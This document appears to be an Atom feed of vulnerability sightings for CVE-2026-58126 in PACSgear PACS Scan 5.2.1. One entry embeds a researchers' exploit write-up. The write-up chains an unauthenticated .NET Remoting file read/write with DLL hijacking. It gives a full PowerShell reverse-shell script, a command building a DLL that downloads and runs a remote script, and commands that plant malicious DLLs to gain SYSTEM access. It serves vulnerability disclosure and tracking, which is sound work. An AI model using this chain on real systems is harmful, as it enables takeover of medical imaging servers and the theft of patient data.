<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://vulnerability.circl.lu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-07-02T19:56:46.859130+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@circl.lu</email>
  </author>
  <link href="https://vulnerability.circl.lu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent sightings.</subtitle>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/33758839-1cff-407d-b0e4-728613a6d8b9/export</id>
    <title>33758839-1cff-407d-b0e4-728613a6d8b9</title>
    <updated>2026-07-02T19:56:46.879473+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cve.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "33758839-1cff-407d-b0e4-728613a6d8b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58126", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mpmzgon6cf2q", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-58126 \u0432 PACSgear PACS Scan 5.2.1: \u0443\u0433\u0440\u043e\u0437\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438\n\n\n\nhttps://kripta.biz/posts/81A2E910-3A3A-458F-8171-9511D676DCFD", "creation_timestamp": "2026-07-02T02:48:55.069544Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/33758839-1cff-407d-b0e4-728613a6d8b9/export"/>
    <published>2026-07-02T02:48:55.069544+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/d3c60c88-af4e-4421-9554-8c862b8f3b49/export</id>
    <title>d3c60c88-af4e-4421-9554-8c862b8f3b49</title>
    <updated>2026-07-02T19:56:46.881966+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cve.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "d3c60c88-af4e-4421-9554-8c862b8f3b49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58126", "type": "seen", "source": "https://gist.github.com/VAMorales/6dc232729cdd517fa30d581fbcd98d8f", "content": "# 1. Exploit Title: PACSGEAR PACS Scan - Unauthenticated Arbitrary File Read/Write + RCE via .NET Remoting\n## Disclosure Date: 07/01/2026\n## CVE ID: [CVE-2026-58126](https://www.cve.org/cverecord?id=CVE-2026-58126)\n## Exploit Authors: Victor A. Morales and Jan A. Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://www.hyland.com/en/solutions/products/pacsgear\n## Known Affected Versions: 5.2.1\n\n### Description\nPACSGear PACS Scan exposes on all interfaces a .NET Remoting service on port 22222 registered by the executable file PGImageExchQueue.exe. The RegisterWellKnownServiceType function is used to register the .NET Remoting TCP channel for the service configured. The registered ObjectURI is PGImageExchange. By modifying the Proof of Concept of an object unmarshalling technique discovered by researchers of Code-White, implementing the .NET WebClient class method to read/write internal files and using a custom channel sink to force the connection to the correct host and port, arbitrary file read can be achieved to leak the contents of internal system files. This exploitation only requires the knowledge of a valid ObjectURI, which is default across all instances and does not require authentication.\n\nTo achieve RCE, it was observed that the executable PGImageExchangeQueueSvc.exe, running as NT Authority\\SYSTEM, attempts to load multiple missing dynamic-link libraries file system paths (e.g. CRYPTSP.DLL) when started, resulting in DLL hijacking oportunities when combined with the .NET Remoting AFR primitive.\n\n### Proof-of-Concept\n\n`.\\RemotingClient_MBRO_Lazy.exe tcp://:22222/PGImageExchange C:\\Windows\\win.ini`\n\nSnippet of the custom channel fix code:\n\n```csharp\ninternal class ChannelUriFixingClientChannelSinkProvider : IClientChannelSinkProvider\n    {\n        private readonly string publicHost;\n        private readonly int publicPort;\n\n        public IClientChannelSinkProvider Next { get; set; }\n\n        public ChannelUriFixingClientChannelSinkProvider(Uri objUrl)\n        {\n            if (objUrl == null) throw new ArgumentNullException(nameof(objUrl));\n\n            this.publicHost = objUrl.Host;\n            this.publicPort = objUrl.Port;\n        }\n    }\n```\n\nThe following code is the PowerShell TCP Reverse Connection script used for code execution.\n\n```powershell\n$IPAddress = '192.168.179.136'\n$Port      = '8443'\n \n# Reverse Shell - v4.0 Compatible\n$RSC = New-Object System.Net.Sockets.TCPClient($IPAddress, $Port)\n$Strm = $RSC.GetStream()\n[byte[]]$DB = 0..65535 | % {0}\n \n# StringWriter for output buffering\n$OB = New-Object System.IO.StringWriter\n \nwhile (($i = $Strm.Read($DB, 0, $DB.Length)) -ne 0) {\n    Try {\n        # Using the static Encoding property (v4.0 safe)\n        $Comm = [System.Text.Encoding]::ASCII.GetString($DB, 0, $i)\n        $CommOut = (iex $Comm *&amp;gt;&amp;amp;1 | Out-String)\n    } Catch {\n        $CommOut = \"$($Error[0])`n\"\n    }\n \n    $OB.Write($CommOut)\n    $ProStr = $OB.ToString() + 'PS ' + (PWD).Path + '&amp;gt; ' \n    $ProBts = [System.Text.Encoding]::ASCII.GetBytes($ProStr)\n\n    $Strm.Write($ProBts, 0, $ProBts.Length)\n    $Strm.Flush()\n\n    # Clear the buffer for the next command\n    $OB.GetStringBuilder().Clear() | Out-Null\n}\n \n$Strm.Close()\n$RSC.Close()\n```\n\nThe open-source tool DlHell from Synacktiv, which supports local and remote DCOM-based Windows DLL proxying, was slightly modified to compile for 32-bit architectures. A PowerShell reverse TCP connection script was developed and exported as a malicious DLL payload for use named test.dll, which will get triggered by CRYPTST.DLL upon a service/system restart. Even though from Linux, it was not fully possible to compile the dynamic-link libraries, DlHell still generates the necessary files and definitions to repair the export tables from Windows.\n\n```bash\npython3 DLHell32.py -t template-32.tpe -c \"powershell.exe -ExecutionPolicy Bypass -c \\\\\\\"IEX (New-Object Net.WebClient).DownloadString('http://192.168.179.130/rs.ps1')\\\\\\\"\" -local-lib 'lib/cryptsp.dll' -local-target test.dll\n```\n\nThe following Windows command outputs an object file intended for later linking in a Windows build.\n\n`cl /nologo /c /01 /GS- /DWIN32 cryptsp.cpp`\n\nThe following Windows command links the compiled object file (cryptsp.obj) into a DLL.\n\n`link /nologo /DLL /DEF:cryptsp.def cryptsp.obj /OUT:cryptsp.dll`\n\nThe arbitrary file write primitive is used to upload the malicious generated dynamic-link libraries using the modified version of RemotingClient_MBRO technique.\n\n`.\\RemotingClient_MBRO.exe --put tcp://:22222/PGImageExchange .\\cryptsp.dll \"C:\\Program Files (x86)\\Pacsgear\\Pacsgear Image Exchange Service\\cryptsp.dll\"`\n\n`.\\RemotingClient_MBRO.exe --put tcp://:22222/PGImageExchange .\\test.dll \"C:\\Program Files (x86)\\Pacsgear\\Pacsgear Image Exchange Service\\test.dll\"`\n\nExploitation requires a restart of the affected service. Based on the privilege level of the account, this may be accomplished by directly restarting the service, rebooting the system, or relying on an automatic restart triggered by a service failure. These tasks cannot be performed by a low-privileged user.\n\nAfter restarting the PGImageExchangeQueueSvc.exe service, which attempts to load the dynamic-link library CRYPTST.DLL, test.dll is triggered, causing the remote host to connect to an attacker-controlled web server on port 80 and execute the PowerShell reverse connection script.\n\nThe reverse connection is established and runs as the privileged NT Authority\\SYSTEM account.", "creation_timestamp": "2026-07-01T11:51:57.085870Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/d3c60c88-af4e-4421-9554-8c862b8f3b49/export"/>
    <published>2026-07-01T11:51:57.085870+00:00</published>
  </entry>
</feed>
